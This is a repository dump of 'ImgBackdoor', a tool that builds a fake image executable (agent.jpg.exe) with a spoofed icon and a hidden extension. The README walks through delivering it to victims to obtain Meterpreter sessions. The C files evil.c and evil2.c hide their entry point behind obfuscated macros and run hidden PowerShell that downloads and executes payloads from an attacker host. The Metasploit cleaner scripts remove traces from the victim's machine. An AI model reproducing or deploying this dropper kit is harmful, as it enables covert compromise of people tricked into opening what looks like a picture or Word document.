165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 | []()
5 | []()
6 | []()
7 | []()
8 |
9 | _____ ____ _ _
10 | |_ _| | _ \ | | | |
11 | | | _ __ ___ __ _| |_) | __ _ ___| | ____| | ___ ___ _ __
12 | | | | '_ ` _ \ / _` | _ < / _` |/ __| |/ / _` |/ _ \ / _ \| '__|
13 | _| |_| | | | | | (_| | |_) | (_| | (__| < (_| | (_) | (_) | |
14 | |_____|_| |_| |_|\__, |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_|
15 | __/ |
16 | |___/
17 |
18 | Version release: v1.0 (Stable)
19 | Author: Ferdi S Kennedy [ kennedy69 ]
20 | Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
21 |
22 | ## Legal Disclamer:
23 | The author does not hold any responsibility for the bad use of this tool,
24 | remember that attacking targets without prior consent is illegal and punished by law.
25 |
26 |
27 |
28 | ## Description:
29 | This module takes one existing image.jpg and one payload.ps1 (input by user) and
30 | builds a new payload (agent.jpg.exe) that if executed it will trigger the download of
31 | the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.
32 |
33 | This module also changes the agent.exe Icon to match one file.jpg Then uses the spoof
34 | 'Hide extensions for known file types' method to hidde the agent.exe extension.
35 |
36 | All payloads (user input) will be downloaded from our apache2 webserver
37 | and executed into target RAM. The only extension (payload input by user)
38 | that requires to write payload to disk are .exe binaries.
39 |
40 | ## Exploitation:
41 | ImgBackdoor stores all files in apache2 webroot, zips (.zip) the agent,
42 | starts apache2 and metasploit services(handler), and provides a URL to send to
43 | target (triggers agent.zip download). As soon as the victim runs our executable,
44 | our picture will be downloaded and opened in the default picture viewer, our
45 | malicious payload will be executed, and we will get a meterpreter session.
46 |
47 | But it also stores the agent (not ziped) into ImgBackdoor/output folder
48 | if we wish to deliver agent.jpg.exe using another diferent attack vector.
49 |
50 | 'This tool also builds a cleaner.rc file to delete payloads left in target'
51 |
52 | ## Payloads accepted (user input):
53 | payload.ps1 (default) | payload.bat | payload.txt | payload.exe [Metasploit]
54 | "Edit 'settings' file before runing tool to use other extensions"
55 |
56 | ## Pictures accepted (user input):
57 | All pictures with .jpg (default) | .jpeg | .png extensions (all sizes)
58 | "Edit 'settings' file before runing tool to use other extensions"
59 |
60 |
61 |
62 | ## Dependencies/Limitations:
63 | xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
64 | 'Auto-Installs ResourceHacker.exe under ../.wine/Program Files/.. directorys'
65 |
66 | WARNING: To change icon manually (resource hacker bypass) edit 'settings' file.
67 | WARNING: Only under windows systems the 2º extension will be hidden (so zip it)
68 | WARNING: The agent.jpg.exe requires the inputed files to be in apache2 (local lan hack)
69 | WARNING: The agent.jpg.exe uses the powershell interpreter (does not work againts wine).
70 | WARNING: This tool will not accept payload (user input) arguments (eg nc.exe -lvp 127.0.0.1 555)
71 | WARNING: The ResourceHacker provided by this tool requires WINE to be set to windows 7
72 |
73 |
74 |
75 | ## Another senarios:
76 | If you wish to use your own binary (user input - not metasploit payloads) then:
77 | 1 - Edit 'settings' file before runing tool and select 'NON_MSF_PAYLOADS=YES'
78 | 2 - Select the binary extension to use
79 | **'Remmenber to save settings file before continue'** ..
80 |
81 | 3 - Run ImgBackdoor to metamorphosis your binary (auto-storage all files in apache) ..
82 | 4 - Open new terminal and execute your binary handler to recibe connection.
83 | **HINT: This funtion will NOT build a cleaner.rc**
84 |
85 |
86 |
87 | ## The noob friendly funtion:
88 | Bypass the need to input your payload.ps1, And let ImgBackdoor take
89 | care of building the required payload.ps1 + agent.jpg.exe and config the handler.
90 | "With this funtion active, you only need to input your picture.jpg :D"
91 | Select the binary extension to use
92 | **HINT: This funtion allow users to build (ps1|bat|txt) payloads**
93 | **HINT: This funtion will NOT build .exe binaries**
94 |
95 |
96 |
97 | ## "WINE is not owned by you":
98 | If you get this message it means that you are executing ImgBackdoor
99 | as sudo and your wine installation belongs to user (is not owned by you) to
100 | bypass this issue just execute ImgBackdoor as the wine owner.
101 | EXAMPLE: If wine its owned by spirited_wolf, execute tool without sudo
102 | EXAMPLE: If wine its owned by root, execute tool as sudo
103 |
104 |
105 |
106 | ## Download/Install/Config:
107 | 1 - Download framework from github
108 | git clone https://github.com/Tsuyoken/ImgBackdoor
109 |
110 | 2 - Set files execution permitions
111 | cd ImgBackdoor
112 | sudo chmod +x *.sh
113 |
114 | 3 - Config ImgBackdoor settings
115 | nano settings
116 |
117 | 4 - Run main tool
118 | sudo ./ImgBackdoor
119 |
120 | #### WARNING: set Resource-Hacker.exe installer to 'Program Files' (not Program Files (x86))
121 |
--------------------------------------------------------------------------------
/banner:
--------------------------------------------------------------------------------
1 | ▜▘ ▛▀▖ ▌ ▌
2 | ▐ ▛▚▀▖▞▀▌▙▄▘▝▀▖▞▀▖▌▗▘▞▀▌▞▀▖▞▀▖▙▀▖
3 | ▐ ▌▐ ▌▚▄▌▌ ▌▞▀▌▌ ▖▛▚ ▌ ▌▌ ▌▌ ▌▌
4 | ▀▘▘▝ ▘▗▄▘▀▀ ▝▀▘▝▀ ▘ ▘▝▀▘▝▀ ▝▀ ▘
5 |
--------------------------------------------------------------------------------
/bin/FIE_logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/FIE_logo.png
--------------------------------------------------------------------------------
/bin/cleaner.rc:
--------------------------------------------------------------------------------
1 | search -d C:\\Users\\Public -f FaaF.AssA
2 | rm C:\\Users\\Public\\FaaF.AssA
3 |
--------------------------------------------------------------------------------
/bin/cleaner2.rc:
--------------------------------------------------------------------------------
1 | migrate -n explorer.exe
2 | search -d C:\\Users\\Public -f FaaF.AssA
3 | rm C:\\Users\\Public\\FaaF.AssA
4 | search -d C:\\Users\\Public -f payload.RffR
5 | rm C:\\Users\\Public\\payload.RffR
6 |
--------------------------------------------------------------------------------
/bin/evil.c:
--------------------------------------------------------------------------------
1 | /*
2 | Author: kennedy69 [ Ferdi S Kennedy ]
3 | Credits: null byte [ Method POC ]
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 | #define _____(i,s,o,g,r,a,m)(i##r##s##o)
12 | #define _ _____(m,i,n,u,a,l,s)
13 |
14 | int _()
15 | {
16 | system("PoWeRsHeLl -wIn 1 -C (nEw-ObJeCt NeT.WebClIeNt).dOwNlOaDfIlE('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & pOwErShElL -wIn 1 -c C:\\Users\\Public\\ScRee & pOwErShElL -wIn 1 -c \"IEX (NeW-oBjEcT nEt.WeBClIeNt).DoWnLoAdStRiNg('http://LhOsT/payload.EhLh')\"");
17 | return 0;
18 | }
19 |
--------------------------------------------------------------------------------
/bin/evil2.c:
--------------------------------------------------------------------------------
1 | /*
2 | Author: Ferdi S Kennedy [ kennedy69 ]
3 | Credits: null byte [ Method POC ]
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 | #define _____(i,s,o,g,r,a,m)(i##r##s##o)
12 | #define _ _____(m,i,n,u,a,l,s)
13 |
14 | int _()
15 | {
16 | system("PoWeRsHeLl -wIN 1 -C (nEw-ObJeCt NeT.WebClIeNt).DoWnLoAdFiLe('http://LhOsT/ScRee', 'C:\\Users\\Public\\ScRee') & sTaRt C:\\Users\\Public\\ScRee & pOwErShElL -wIN 1 -C (NeW-oBjEcT nEt.WeBClIeNt).dOwNlOaDfIlE('http://LhOsT/payload.EhLh', 'C:\\Users\\Public\\payload.EhLh') & StArT C:\\Users\\Public\\payload.EhLh");
17 | return 0;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/bin/reshacker_setup.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/reshacker_setup.exe
--------------------------------------------------------------------------------
/bin/word.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/bin/word.docx
--------------------------------------------------------------------------------
/icons/JPEG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-black.ico
--------------------------------------------------------------------------------
/icons/JPEG-camera.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-camera.ico
--------------------------------------------------------------------------------
/icons/JPEG-orange.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-orange.ico
--------------------------------------------------------------------------------
/icons/JPEG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPEG-white.ico
--------------------------------------------------------------------------------
/icons/JPG-Ios7.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-Ios7.ico
--------------------------------------------------------------------------------
/icons/JPG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-black.ico
--------------------------------------------------------------------------------
/icons/JPG-green.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-green.ico
--------------------------------------------------------------------------------
/icons/JPG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/JPG-white.ico
--------------------------------------------------------------------------------
/icons/Microsoft-Excel.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Microsoft-Excel.ico
--------------------------------------------------------------------------------
/icons/Microsoft-Word.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Microsoft-Word.ico
--------------------------------------------------------------------------------
/icons/PNG-black.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-black.ico
--------------------------------------------------------------------------------
/icons/PNG-simple.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-simple.ico
--------------------------------------------------------------------------------
/icons/PNG-white.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/PNG-white.ico
--------------------------------------------------------------------------------
/icons/Windows-Logo.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Windows-Logo.ico
--------------------------------------------------------------------------------
/icons/Windows-Store.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/icons/Windows-Store.ico
--------------------------------------------------------------------------------
/output/.set:
--------------------------------------------------------------------------------
1 | srt=nothing_stable
2 |
--------------------------------------------------------------------------------
/pictures/Linux_Communism.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/Linux_Communism.png
--------------------------------------------------------------------------------
/pictures/about_communism.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/about_communism.jpg
--------------------------------------------------------------------------------
/pictures/communist-windows.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/communist-windows.jpg
--------------------------------------------------------------------------------
/pictures/tux.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tux.jpeg
--------------------------------------------------------------------------------
/pictures/tux_communism.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tux_communism.jpg
--------------------------------------------------------------------------------
/pictures/tuxguevara.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Tsuyoken/ImgBackdoor/9ba0c1b9840076610a259f4295978c52a8189664/pictures/tuxguevara.png
--------------------------------------------------------------------------------
/settings:
--------------------------------------------------------------------------------
1 | ## ImgBackdoor uses by default .jpg extensions
2 | # (picture input by user) but it can be configurated
3 | # to use other extensions, just change the next value.
4 | # values accepted are: jpg | jpeg | png | etc
5 | ---------------------
6 | PICTURE_EXTENSION=jpg
7 | ---------------------
8 |
9 |
10 |
11 | ## ImageBackdoor uses by default .ps1 extensions
12 | # (payload input by user) but it can be configurated
13 | # to use other extensions, just change the next value.
14 | # values accepted are: ps1 | bat | txt | exe
15 | ---------------------
16 | PAYLOAD_EXTENSION=exe
17 | ---------------------
18 |
19 |
20 |
21 | ## Bypass the use of Resource-Hacker funtion
22 | # This nex settings allow users to bypass the
23 | # changing agent.jpg.exe icon (.ico) replacement.
24 | # WARNING: you will need to replace the icon manually.
25 | # values accepted are: NO or YES
26 | ------------
27 | BYPASS_RH=NO
28 | ------------
29 |
30 |
31 |
32 | ## Apache2 webroot (local) full path.
33 | # This setting its required to use apache2
34 | # webserver to deliver agent.zip to target.
35 | # Please check your apache2 webroot install.
36 | ----------------------------
37 | APACHE_WEBROOT=/var/www/html
38 | ----------------------------
39 |
40 |
41 |
42 | ## Use a non-metasploit payload (payload user input)
43 | # This setting allow users to metamorphosis your own binary (eg netcat)
44 | # using FakeImageExploiter tool (all files will be ported to apache)
45 | # And start your currespondent binary handler (listener) manually ..
46 | # values accepted are: NO or YES
47 | -------------------
48 | NON_MSF_PAYLOADS=NO
49 | -------------------
50 |
51 |
52 |
53 | ## THE NOOB FRIENDLY FUNTION ..
54 | # This funtion forces FakeImageExploiter to build the
55 | # payload.ps1 without the user needs to manually build it.
56 | # ---
57 | # WARNING: This funtion will only build: ( ps1 | bat |txt ).
58 | # WARNING: This funtion will use: 'payload_extension=' settings.
59 | # values accepted are: NO and YES
60 | ---------------------
61 | AUTO_PAYLOAD_BUILD=NO
62 | AGENT_HANDLER_PORT=666
63 | ---------------------
64 |
65 |
66 |
67 | ## FAKE WORD DOC FUNTION (word.docx) ..
68 | # This funtion allow users to change agent icon to match one
69 | # word_doc file, And changes the extension to: agent.docx.exe
70 | # --
71 | # HINT: select also 'picture_extension=docx' and chose as image
72 | # FakeImageExploiter/bin/word.docx that it will execute the docx
73 | # document instead of opening image.jpg
74 | # values accepted are: NO and YES
75 | ----------------
76 | FAKE_WORD_DOC=NO
77 | ----------------
78 |
79 |
80 |
81 | ## USE YOUR PUBLIC IP (to deliver payloads over wan)
82 | # This funtion requieres user to set is machine as a webserver
83 | # and use your public ip addr to deliver agent.jpg.exe over wan ..
84 | # ---
85 | # To use this funtion we need to set 'use_public_ip=yes'
86 | # and write your public_ip value to match your ip addr.
87 | ----------------
88 | USE_PUBLIC_IP=NO
89 | EXTERNAL_IP=write_public_address_here
90 | ----------------
91 |
92 |
93 |
94 | ### msf postgresql database connection check ? (msfdb init)
95 | # This next setting allow users to check msf postgresql
96 | # connection status and rebuild msfdb if not connected.
97 | # values accepted are: OFF or ON
98 | ---------------
99 | MSF_REBUILD=OFF
100 | ---------------
101 |
102 |
103 |
104 |
105 | _EOF
106 |
107 |
--------------------------------------------------------------------------------